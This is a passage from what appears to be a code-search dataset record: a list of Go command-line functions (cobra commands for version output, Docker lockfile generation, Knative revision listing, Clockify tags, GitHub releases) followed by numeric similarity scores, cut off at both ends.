rootCommand\n}", "func New(buildRevision, buildTime string) *cobra.Command {\n\trootCmd := &cobra.Command{\n\t\tUse: \"iris-cli\",\n\t\tShort: \"Command Line Interface for Iris\",\n\t\tLong: `Iris CLI is a tool for Iris Web Framework.\nIt can be used to install starter kits and project structures \nComplete documentation is available at https://github.com/kataras/iris-cli`,\n\t\tSilenceErrors: true,\n\t\tSilenceUsage: true,\n\t\tTraverseChildren: true,\n\t\tSuggestionsMinimumDistance: 1,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t},\n\t}\n\n\thelpTemplate := HelpTemplate{\n\t\tBuildRevision: buildRevision,\n\t\tBuildTime: buildTime,\n\t\tShowGoRuntimeVersion: true,\n\t}\n\trootCmd.SetHelpTemplate(helpTemplate.String())\n\n\t// Commands.\n\trootCmd.AddCommand(newCommand())\n\trootCmd.AddCommand(runCommand())\n\trootCmd.AddCommand(addCommand())\n\n\treturn rootCmd\n}", "func createCommand(ctx context.Context, cmdline []string, env env) commander {\n\tlogrus.Debugf(\"command: %v (env: %s)\", cmdline, env)\n\tcmd := exec.CommandContext(ctx, cmdline[0], cmdline[1:]...)\n\tcmd.Env = env.AsPairs()\n\treturn cmd\n}", "func NewRevisionListCommand(p *commands.KnParams) *cobra.Command {\n\trevisionListFlags := flags.NewListPrintFlags(RevisionListHandlers)\n\n\trevisionListCommand := &cobra.Command{\n\t\tUse: \"list\",\n\t\tShort: \"List revisions\",\n\t\tAliases: []string{\"ls\"},\n\t\tLong: \"List revisions for a given service.\",\n\t\tExample: `\n # List all revisions\n kn revision list\n\n # List revisions for a service 'svc1' in namespace 'myapp'\n kn revision list -s svc1 -n myapp\n\n # List all revisions in JSON output format\n kn revision list -o json\n\n # List revision 'web'\n kn revision list web`,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tnamespace, err := p.GetNamespace(cmd)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tclient, err := p.NewServingClient(namespace)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Create list filters\n\t\t\tvar params []clientservingv1.ListConfig\n\t\t\tparams, err = appendServiceFilter(params, client, cmd)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tparams, err = appendRevisionNameFilter(params, args)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Query for list with filters\n\t\t\trevisionList, err := client.ListRevisions(cmd.Context(), params...)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Stop if nothing found\n\t\t\tif !revisionListFlags.GenericPrintFlags.OutputFlagSpecified() && len(revisionList.Items) == 0 {\n\t\t\t\tfmt.Fprintf(cmd.OutOrStdout(), \"No revisions found.\\n\")\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\t// Add namespace column if no namespace is given (i.e. \"--all-namespaces\" option is given)\n\t\t\tif namespace == \"\" {\n\t\t\t\trevisionListFlags.EnsureWithNamespace()\n\t\t\t}\n\n\t\t\t// Only add temporary annotations if human readable output is requested\n\t\t\tif !revisionListFlags.GenericPrintFlags.OutputFlagSpecified() {\n\t\t\t\terr = enrichRevisionAnnotationsWithServiceData(cmd.Context(), p.NewServingClient, revisionList)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Sort revisions by namespace, service, generation (in this order)\n\t\t\tsortRevisions(revisionList)\n\n\t\t\t// Print out infos via printer framework\n\t\t\treturn revisionListFlags.Print(revisionList, cmd.OutOrStdout())\n\t\t},\n\t}\n\tcommands.AddNamespaceFlags(revisionListCommand.Flags(), true)\n\trevisionListFlags.AddFlags(revisionListCommand)\n\trevisionListCommand.Flags().StringVarP(&serviceNameFilter, \"service\", \"s\", \"\", \"Service name\")\n\n\treturn revisionListCommand\n}", "func versionString() string {\n\tvar version string\n\tif SHA != \"\" {\n\t\tversion = fmt.Sprintf(\"%s (%s)\", Version, SHA)\n\t} else {\n\t\tversion = fmt.Sprintf(\"%s-dev\", Version) // no SHA. '0.x.y-dev' indicates it is run from source without build script.\n\t}\n\tif BuildTime != \"\" {\n\t\ti, err := strconv.ParseInt(BuildTime, 10, 64)\n\t\tif err == nil {\n\t\t\ttm := time.Unix(i, 0)\n\t\t\tversion += fmt.Sprintf(\" built %s\", tm.Format(time.RFC822))\n\t\t}\n\t}\n\treturn fmt.Sprintf(\"dnscontrol %s\", version)\n}", "func createCommand(t *runner.Task, actionFunc func(*cli.Context) error) *cli.Command {\n\tcommand := &cli.Command{\n\t\tName: t.Name,\n\t\tUsage: strings.TrimSpace(t.Usage),\n\t\tDescription: strings.TrimSpace(t.Description),\n\t\tAction: actionFunc,\n\t}\n\n\tfor _, arg := range t.Args {\n\t\tcommand.ArgsUsage += fmt.Sprintf(\"<%s> \", arg.Name)\n\t}\n\n\tcommand.CustomHelpTemplate = createCommandHelp(t)\n\n\treturn command\n}", "func (c *Command) VersionCommand() *version.Command {\n\treturn c.versionCommand\n}", "func NewWithSubCmds(\n\tdescription string,\n\tversion string,\n\tcommand1 *command.Cmd,\n\tcommandsN ...*command.Cmd,\n) CLI {\n\tapp := app.App{\n\t\tName: path.Base(os.Args[0]),\n\t\tDescription: description,\n\t\tVersionString: version,\n\t\tHasSubCmds: true,\n\t}\n\treturn mkNew(app, append([]*command.Cmd{command1}, commandsN...)...)\n}", "func BuildCmdArgs(cmd *cobra.Command, msg string) string {\n\tvar ans string = \"mottainai-cli \"\n\n\tif cmd == nil {\n\t\tpanic(\"Invalid command\")\n\t}\n\n\tif cmd.Flag(\"master\").Changed {\n\t\tans += \"--master \" + v.GetString(\"master\") + \" \"\n\t}\n\tif v.GetString(\"profile\") != \"\" {\n\t\tans += \"--profile \" + v.GetString(\"profile\") + \" \"\n\t}\n\n\tans += msg\n\n\treturn ans\n}", "func runReleaseCmd(cmd *cobra.Command, args []string) {\n\tconfigFile, _ := cmd.Flags().GetString(\"config\")\n\tconfig := &config.Config{}\n\terr := config.Load(configFile)\n\tif err != nil {\n\t\tfmt.Printf(\"could not load config file: %v\\n\", err)\n\t\tos.Exit(1)\n\t\treturn\n\t}\n\n\tspinner, err := initSpinner(fmt.Sprintf(\"Releasing v%s of %s\", args[0], config.Repository))\n\tif err != nil {\n\t\tfmt.Println(\"could not init spinner\")\n\t\tos.Exit(1)\n\t\treturn\n\t}\n\tspinner.Start()\n\n\tnewRelease, err := github.NewRelease(config, args, spinner)\n\tif err != nil {\n\t\tspinner.StopFailMessage(fmt.Sprintf(\"%v\", err))\n\t\tspinner.StopFail()\n\t\tos.Exit(1)\n\t\treturn\n\t}\n\n\tcl, err := changelog.HandleChangelog(newRelease.ProjectName, newRelease.Version, newRelease.Date, spinner)\n\tif err != nil {\n\t\tspinner.StopFailMessage(fmt.Sprintf(\"%v\", err))\n\t\tspinner.StopFail()\n\t\tos.Exit(1)\n\t\treturn\n\t}\n\n\tnewRelease.Changelog = cl\n\n\tvar binaryPath string\n\tskipBinary, _ := cmd.Flags().GetBool(\"skipBinary\")\n\tif !skipBinary {\n\t\t// set project build path so we have a predictable location\n\t\tbinaryPath = fmt.Sprintf(binaryPathFmt, newRelease.ProjectName, newRelease.Version)\n\t\trunBuildCmd(cmd, []string{newRelease.Version, binaryPath})\n\t}\n\n\ttokenFile, _ := cmd.Flags().GetString(\"tokenFile\")\n\terr = newRelease.CreateGithubRelease(tokenFile, binaryPath, spinner)\n\tif err != nil {\n\t\tspinner.StopFailMessage(fmt.Sprintf(\"%v\", err))\n\t\tspinner.StopFail()\n\t\tos.Exit(1)\n\t\treturn\n\t}\n\n\tspinner.Suffix(\" Finished release\")\n\tspinner.Stop()\n}", "func NewCmdTag(f cmdutil.Factory) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"tag\",\n\t\tAliases: []string{\"tags\"},\n\t\tShort: \"List tags on Clockify\",\n\t\tExample: heredoc.Docf(`\n\t\t\t$ %[1]s\n\t\t\t+--------------------------+------------------+\n\t\t\t| ID | NAME |\n\t\t\t+--------------------------+------------------+\n\t\t\t| 62194867edaba27d0a45b464 | Code Review |\n\t\t\t| 6219485e8cb9606d934ebb5f | Meeting |\n\t\t\t| 621948708cb9606d934ebba7 | Pair Programming |\n\t\t\t| 6143b768195e5c503960a775 | Special Tag |\n\t\t\t+--------------------------+------------------+\n\n\t\t\t$ %[1]s --name code -q\n\t\t\t62194867edaba27d0a45b464\n\n\t\t\t$ %[1]s --format \"{{.Name}}\" -archived\n\t\t\tArchived Tag\n\t\t`, \"clockify-cli tag\"),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tformat, _ := cmd.Flags().GetString(\"format\")\n\t\t\tquiet, _ := cmd.Flags().GetBool(\"quiet\")\n\t\t\tif err := cmdutil.XorFlag(map[string]bool{\n\t\t\t\t\"format\": format != \"\",\n\t\t\t\t\"quiet\": quiet,\n\t\t\t}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tarchived, _ := cmd.Flags().GetBool(\"archived\")\n\t\t\tname, _ := cmd.Flags().GetString(\"name\")\n\n\t\t\ttags, err := getTags(f, name, archived)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tout := cmd.OutOrStdout()\n\t\t\tif format != \"\" {\n\t\t\t\treturn output.TagPrintWithTemplate(format)(tags, out)\n\t\t\t}\n\n\t\t\tif quiet {\n\t\t\t\treturn output.TagPrintQuietly(tags, out)\n\t\t\t}\n\n\t\t\treturn output.TagPrint(tags, os.Stdout)\n\t\t},\n\t}\n\n\tcmd.Flags().StringP(\"name\", \"n\", \"\",\n\t\t\"will be used to filter the tag by name\")\n\tcmd.Flags().StringP(\"format\", \"f\", \"\",\n\t\t\"golang text/template format to be applied on each Tag\")\n\tcmd.Flags().BoolP(\"quiet\", \"q\", false, \"only display ids\")\n\tcmd.Flags().BoolP(\"archived\", \"\", false, \"only display archived tags\")\n\n\treturn cmd\n}", "func version() {\n fmt.Printf(\"v%s\\ncommit=%s\\n\", versionNumber, commitId)\n}", "func NewCreateCommand(c2ClientFactory cli.APIClientFactory) cli.Command {\n\tcreateCmd := &createCommand{\n\t\tc2ClientFactory: c2ClientFactory,\n\t}\n\n\tcobraCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Creates a new client\",\n\t\tLong: fmt.Sprintf(\"Creates a new client, require an unique name, and a file containing either a password or a %d bytes key\", e4crypto.KeyLen),\n\t\tRunE: createCmd.run,\n\t}\n\n\tcobraCmd.Flags().SortFlags = false\n\tcobraCmd.Flags().StringVar(&createCmd.flags.Name, \"name\", \"\", \"The client name\")\n\tcobraCmd.Flags().StringVar(&createCmd.flags.KeyPath, \"key\", \"\", fmt.Sprintf(\"Filepath to a %d bytes key\", e4crypto.KeyLen))\n\tcobraCmd.Flags().StringVar(&createCmd.flags.PasswordPath, \"password\", \"\", \"Filepath to a plaintext password file\")\n\n\tcreateCmd.cobraCmd = cobraCmd\n\n\treturn createCmd\n}", "func Register(root *cobra.Command) {\n\troot.AddCommand(\n\t\t&cobra.Command{\n\t\t\tUse: \"version\",\n\t\t\tShort: \"Print the version of OpenFlag\",\n\t\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\t\tcmd.Println(version.String())\n\t\t\t},\n\t\t},\n\t)\n}", "func newManifestCmd(rootParams *rootParameters) *cobra.Command {\n\tmanifestParams := manifestParameters{rootParameters: rootParams}\n\tcmd := &cobra.Command{\n\t\tUse: \"manifest\",\n\t\tShort: \"Manage manifests inside a repository\",\n\t\tLong: newManifestCmdLongMessage,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tcmd.Help()\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tlistManifestCmd := newManifestListCmd(&manifestParams)\n\tdeleteManifestCmd := newManifestDeleteCmd(&manifestParams)\n\n\tcmd.AddCommand(\n\t\tlistManifestCmd,\n\t\tdeleteManifestCmd,\n\t)\n\tcmd.PersistentFlags().StringVar(&manifestParams.repoName, \"repository\", \"\", \"The repository name\")\n\t// Since the repository will be needed in either subcommand it is marked as a required flag\n\tcmd.MarkPersistentFlagRequired(\"repository\")\n\n\treturn cmd\n}", "func NewVersionInfo() VersionInfo {\n\tver := VersionInfo{\n\t\tVersion: \"dev\",\n\t\tBuildDate: BuildDate,\n\t\tGitCommit: GitCommit,\n\t\tGitState: \"\",\n\t}\n\tif Version != \"\" {\n\t\tver.Version = Version\n\t\tver.GitState = \"clean\"\n\t}\n\tif GitState != \"\" {\n\t\tver.GitState = GitState\n\t}\n\treturn ver\n}", "func Main() *cobra.Command {\n\tcreateCmd := preview.NewCmdPreviewLegacy()\n\n\tcmd := &cobra.Command{\n\t\tUse: rootcmd.TopLevelCommand,\n\t\tShort: \"Preview commands\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tif len(args) <= 1 {\n\t\t\t\tlog.Logger().Info(\"aliasing this to the create command\")\n\t\t\t\terr := createCmd.ParseFlags(args)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Logger().Errorf(err.Error())\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tcreateCmd.Run(cmd, args)\n\t\t\t\treturn\n\t\t\t}\n\t\t\terr := cmd.Help()\n\t\t\tif err != nil {\n\t\t\t\tlog.Logger().Errorf(err.Error())\n\t\t\t}\n\t\t},\n\t\tDisableFlagParsing: true,\n\t}\n\tcmd.AddCommand(createCmd)\n\tcmd.AddCommand(cobras.SplitCommand(version.NewCmdVersion()))\n\treturn cmd\n}", "func SetVersion(version string) {\n\trootCmd.Cmd.Version = version\n}", "func NewGenerateCmd() (*cobra.Command, error) {\n\tgenerateCmd := &cobra.Command{\n\t\tUse: \"generate\",\n\t\tShort: \"Generate a Lockfile to track image digests\",\n\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn bindPFlags(cmd, []string{\n\t\t\t\t\"base-dir\",\n\t\t\t\t\"dockerfiles\",\n\t\t\t\t\"composefiles\",\n\t\t\t\t\"kubernetesfiles\",\n\t\t\t\t\"lockfile-name\",\n\t\t\t\t\"dockerfile-globs\",\n\t\t\t\t\"composefile-globs\",\n\t\t\t\t\"kubernetesfile-globs\",\n\t\t\t\t\"dockerfile-recursive\",\n\t\t\t\t\"composefile-recursive\",\n\t\t\t\t\"kubernetesfile-recursive\",\n\t\t\t\t\"exclude-all-dockerfiles\",\n\t\t\t\t\"exclude-all-composefiles\",\n\t\t\t\t\"exclude-all-kubernetesfiles\",\n\t\t\t\t\"ignore-missing-digests\",\n\t\t\t\t\"update-existing-digests\",\n\t\t\t})\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tflags, err := parseFlags()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tgenerator, err := SetupGenerator(flags)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tvar lockfileByt bytes.Buffer\n\n\t\t\terr = generator.GenerateLockfile(&lockfileByt)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tlockfileContents := lockfileByt.Bytes()\n\n\t\t\tif len(lockfileContents) == 0 {\n\t\t\t\treturn errors.New(\"no images found\")\n\t\t\t}\n\n\t\t\twriter, err := os.Create(\n\t\t\t\tflags.FlagsWithSharedValues.LockfileName,\n\t\t\t)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer writer.Close()\n\n\t\t\t_, err = writer.Write(lockfileContents)\n\t\t\tif err == nil {\n\t\t\t\tfmt.Println(\"successfully generated lockfile!\")\n\t\t\t}\n\n\t\t\treturn err\n\t\t},\n\t}\n\tgenerateCmd.Flags().String(\n\t\t\"base-dir\", \".\", \"Top level directory to collect files from\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfiles\", []string{}, \"Paths to Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"composefiles\", []string{}, \"Paths to docker-compose files\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"kubernetesfiles\", []string{}, \"Paths to kubernetes files\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"lockfile-name\", \"docker-lock.json\",\n\t\t\"Lockfile name to be output in the current working directory\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfile-globs\", []string{}, \"Glob pattern to select Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"composefile-globs\", []string{},\n\t\t\"Glob pattern to select docker-compose files\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"kubernetesfile-globs\", []string{},\n\t\t\"Glob pattern to select kubernetes files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"dockerfile-recursive\", false, \"Recursively collect Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"composefile-recursive\", false,\n\t\t\"Recursively collect docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"kubernetesfile-recursive\", false,\n\t\t\"Recursively collect kubernetes files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"exclude-all-dockerfiles\", false,\n\t\t\"Do not collect Dockerfiles unless referenced by docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"exclude-all-composefiles\", false,\n\t\t\"Do not collect docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"exclude-all-kubernetesfiles\", false,\n\t\t\"Do not collect kubernetes files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"ignore-missing-digests\", false,\n\t\t\"Do not fail if unable to find digests\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"update-existing-digests\", false,\n\t\t\"Query registries for new digests even if they are hardcoded in files\",\n\t)\n\n\treturn generateCmd, nil\n}", "func main() {\n\terr := cmd.Execute(version)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n}", "func NewGenerateCmd(client *registry.HTTPClient) *cobra.Command {\n\tgenerateCmd := &cobra.Command{\n\t\tUse: \"generate\",\n\t\tShort: \"Generate a Lockfile to track image digests\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif err := validateGenerateCmdFlags(cmd); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tenvPath, err := cmd.Flags().GetString(\"env-file\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tenvPath = filepath.ToSlash(envPath)\n\t\t\t_ = godotenv.Load(envPath)\n\t\t\twm, err := getDefaultWrapperManager(cmd, client)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tgenerator, err := generate.NewGenerator(cmd)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tlFile, err := os.Create(generator.LockfileName)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer lFile.Close()\n\t\t\tif err := generator.GenerateLockfile(wm, lFile); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\tgenerateCmd.Flags().String(\n\t\t\"base-dir\", \".\", \"Top level directory to collect files from\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfiles\", []string{}, \"Path to Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"compose-files\", []string{}, \"Path to docker-compose files\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfile-globs\", []string{}, \"Glob pattern to select Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"compose-file-globs\", []string{},\n\t\t\"Glob pattern to select docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"dockerfile-recursive\", false, \"Recursively collect Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"compose-file-recursive\", false,\n\t\t\"Recursively collect docker-compose files\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"lockfile-name\", \"docker-lock.json\",\n\t\t\"Lockfile name to be output in the current working directory\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"config-file\", getDefaultConfigPath(),\n\t\t\"Path to config file for auth credentials\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"env-file\", \".env\", \"Path to .env file\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"dockerfile-env-build-args\", false,\n\t\t\"Use environment vars as build args for Dockerfiles\",\n\t)\n\treturn generateCmd\n}", "func TestGetVersion(t *testing.T) {\n\ttests := []struct {\n\t\tversion string\n\t\tcommit string\n\t\tdate string\n\t\texpect string\n\t\tshortOutput bool\n\t}{\n\t\t{\n\t\t\t\"a\",\n\t\t\t\"b\",\n\t\t\t\"c\",\n\t\t\t\"waver version: a from commit b built on c\",\n\t\t\tfalse,\n\t\t}, {\n\t\t\t\"v0.12.4\",\n\t\t\t\"5b1a61f9b58e3778986c99b1282840ce64329614\",\n\t\t\t\"Thu May 21 16:48:18 PDT 2020\",\n\t\t\t\"waver version: v0.12.4 from commit 5b1a61f9b58e3778986c99b1282840ce64329614 built on Thu May 21 16:48:18 PDT 2020\",\n\t\t\tfalse,\n\t\t}, {\n\t\t\t\"v0.12.4-rc5\",\n\t\t\t\"5b1a61f9b58\",\n\t\t\t\"1590105848\",\n\t\t\t\"waver version: v0.12.4-rc5 from commit 5b1a61f9b58 built on 1590105848\",\n\t\t\tfalse,\n\t\t}, {\n\t\t\t\"v0.12.4-rc5\",\n\t\t\t\"5b1a61f9b58\",\n\t\t\t\"1590105848\",\n\t\t\t\"5b1a61f9b58\",\n\t\t\ttrue,\n\t\t},\n\t}\n\n\t// save the current global variables so they can be set back after testing\n\toldVal := version\n\toldCommit := commit\n\toldDate := date\n\n\tfor _, test := range tests {\n\t\t// run through each test, should not be run in parallel.\n\t\tversion = test.version\n\t\tcommit = test.commit\n\t\tdate = test.date\n\n\t\t// build the new Cobra command and configure stdout and args\n\t\tv := Get(test.shortOutput)\n\n\t\t// assert output string matches expectations\n\t\tassert.Equal(t, test.expect, v)\n\t}\n\n\t// put the original build values back after tests have run\n\tversion = oldVal\n\tcommit = oldCommit\n\tdate = oldDate\n}", "func NewRootCmd(sl service.CommandServicer) (*cobra.Command, error) {\n\trootCmd := &cobra.Command{\n\t\tUse: \"versions\",\n\t\tShort: \"a group of actions for working with versions\",\n\t\tTraverseChildren: true,\n\t}\n\n\tcmdFuncs := []func(locator service.CommandServicer) (*cobra.Command, error){\n\t\tnewListCommand,\n\t\tnewShowCommand,\n\t\tnewPutCommand,\n\t}\n\n\tfor _, f := range cmdFuncs {\n\t\tcmd, err := f(sl)\n\t\tif err != nil {\n\t\t\treturn rootCmd, err\n\t\t}\n\t\trootCmd.AddCommand(cmd)\n\t}\n\n\treturn rootCmd, nil\n}", "func NewReleasesCommand() *cobra.Command {\n\n\tcmd := createListCommand(cmdListReleases, \"releases\", \"\")\n\tcmd.Flags().StringVar(&releaseParams.Name, \"name\", \"\", \"Filter releases by name\")\n\tcmd.Flags().StringVar(&releaseParams.Version, \"version\", \"\", \"Filter releases by version\")\n\tcmd.Flags().StringVar(&releaseParams.StackID, \"stack-id\", \"\", \"Filter releases by stack_id\")\n\tcmd.Flags().StringVar(&releaseParams.StackVersionID, \"stack-version-id\", \"\", \"Filter releases by stack_version_id\")\n\tcmd.Flags().StringVar(&releaseParams.ProjectID, \"project-id\", \"\", \"Filter releases by project_id\")\n\tcmd.Flags().StringVar(&releaseParams.LocImageID, \"loc-image-id\", \"\", \"Filter releases by loc_image_id\")\n\tcmd.Flags().StringVar(&releaseParams.BuildStatus, \"build-status\", \"\", \"Filter releases by build_status\")\n\n\t// Get\n\tgetCmd := createGetCommand(cmdGetReleases, \"release\", \"\")\n\tcmd.AddCommand(getCmd)\n\n\t// Create\n\tcreateCmd := NewReleasesCreateCommand()\n\tcmd.AddCommand(createCmd)\n\n\t// Delete\n\tdeleteCmd := createDeleteCommand(cmdDeleteReleases, \"release\", \"\")\n\tcmd.AddCommand(deleteCmd)\n\n\treturn cmd\n}", "func (v *VersionCommand) runVersion() error {\n\tapiClient := v.cli.Client()\n\n\tresult, err := apiClient.SystemVersion()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to get system version: %v\", err)\n\t}\n\n\tv.cli.Print(result)\n\treturn nil\n}", "func init() {\n\tif debug {\n\t\tlog.SetLogLevel(log.Debug)\n\t}\n\tversion = fmt.Sprintf(\"%d.%d.%d\", major, minor, patch)\n\tclean := (gitstatus == \"0\")\n\t// The docker build will pass the git tag to the build, if it is clean\n\t// from a tag it will look like v0.7.0\n\tif tag != \"v\"+version || !clean {\n\t\tlog.Debugf(\"tag is %v, clean is %v marking as pre release\", tag, clean)\n\t\tversion += \"-pre\"\n\t}\n\tif !clean {\n\t\tbuildInfo += \"-dirty\"\n\t\tlog.Debugf(\"gitstatus is %q, marking buildinfo as dirty: %v\", gitstatus, buildInfo)\n\t}\n\tlongVersion = version + \" \" + buildInfo + \" \" + runtime.Version()\n}", "func buildVersion() string {\n\t// noinspection GoBoolExpressions\n\tif SCMCommit == \"\" || strings.Contains(Version, SCMCommit) {\n\t\treturn Version\n\t}\n\n\treturn fmt.Sprintf(\"%s+%s\", Version, SCMCommit)\n}" ]
[ "0.71332157", "0.6940008", "0.6910998", "0.6894133", "0.68905944", "0.6856503", "0.67919654", "0.67875063", "0.6761101", "0.6744674", "0.66154164", "0.6593916", "0.653667", "0.64331496", "0.6401623", "0.63777304", "0.6329797", "0.62582576", "0.6193203", "0.6113864", "0.6092855", "0.59663206", "0.58960485", "0.5848917", "0.583985", "0.5765297", "0.57528675", "0.571256", "0.5682368", "0.56793183", "0.56514955", "0.55515134", "0.5544611", "0.55423385", "0.5541758", "0.5509743", "0.55058855", "0.5487282", "0.54833966", "0.5463856", "0.5456597", "0.5456597", "0.5423289", "0.53277594", "0.53257585", "0.53070104", "0.5294044", "0.52892625", "0.5283943", "0.5281723", "0.52814996", "0.52787757", "0.5268177", "0.52629447", "0.5260455", "0.5248865", "0.5240608", "0.5223065", "0.5222705", "0.52204645", "0.5207539", "0.5207434", "0.5205473", "0.5202338", "0.5193438", "0.51841563", "0.5177343", "0.51771617", "0.51628184", "0.5160952", "0.5152307", "0.51466954", "0.5136106", "0.5125301", "0.5125043", "0.51238525", "0.51218474", "0.5091385", "0.5090144", "0.50359577", "0.5035929", "0.5035049", "0.5025761", "0.50244707", "0.501923", "0.501782", "0.5015524", "0.5010595", "0.49983603", "0.49944606", "0.49899435", "0.49870923", "0.49865875", "0.49818984", "0.49800482", "0.49685007", "0.4957207", "0.495485", "0.49383876", "0.49357256" ]
0.7849763
0
CreateInfoCommand creates a command akin to that created by CreatedVersionCommand but also includes the output of running each of the supplied info closures.
func CreateInfoCommand(name, prefix string, info ...func(*context.T, *cmdline.Env, []string) error) *cmdline.Command { return &cmdline.Command{ Runner: v23cmd.RunnerFunc(func(ctx *context.T, env *cmdline.Env, args []string) error { printVersion(prefix) for _, ifn := range info { if err := ifn(ctx, env, args); err != nil { return err } } return nil }), Name: name, Short: "Display version information", } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewInfoCommand(agentCli *AgentCli) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"info\",\n\t\tShort: \"Displays system-wide information.\",\n\t\tArgs: cli.NoArgs,\n\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn agentCli.Initialize()\n\t\t},\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\terr := runInfo(agentCli)\n\t\t\tif err != nil {\n\t\t\t\tlogrus.Errorln(err)\n\t\t\t}\n\t\t},\n\t}\n\n\treturn cmd\n}", "func CreateConsensusAuthCoinInfoCmd(cli *client.CommandLineClient) error {\n\tbc, err := client.NewLazyBaseClientFromCommandLineClient(cli)\n\tif err != nil {\n\t\treturn err\n\t}\n\tcreateAuthCoinCmd(cli, NewPluginConsensusClient(bc), cli.ConsensusCmd)\n\treturn nil\n}", "func CreateVersionCommand(name, prefix string) *cmdline.Command {\n\treturn &cmdline.Command{\n\t\tRunner: RunnerFunc(func(_ *cmdline.Env, _ []string) error {\n\t\t\tprintVersion(prefix)\n\t\t\treturn nil\n\t\t}),\n\t\tName: name,\n\t\tShort: \"Display version information\",\n\t}\n}", "func NewInfoCmd() *cobra.Command {\n\t// infoCmd represents the \"info\" command\n\tinfoCmd := &cobra.Command{\n\t\tUse: \"info [FLAGS]\",\n\t\tShort: \"Show isula-build system information\",\n\t\tRunE: infoCommand,\n\t\tArgs: util.NoArgs,\n\t\tExample: infoExample,\n\t}\n\n\tinfoCmd.PersistentFlags().BoolVarP(&infoOpts.humanReadable, \"human-readable\", \"H\", false,\n\t\t\"Print memory info in human readable format, use powers of 1000\")\n\tinfoCmd.PersistentFlags().BoolVarP(&infoOpts.verbose, \"verbose\", \"V\", false,\n\t\t\"Print runtime memory info\")\n\n\treturn infoCmd\n}", "func NewAdminInfoCommand(ioStreams cmdutil.IOStreams) *cobra.Command {\n\ti := &infoCmd{out: ioStreams.Out}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"info\",\n\t\tShort: \"Show vela client and cluster chartPath\",\n\t\tLong: \"Show vela client and cluster chartPath\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn i.run(ioStreams)\n\t\t},\n\t\tAnnotations: 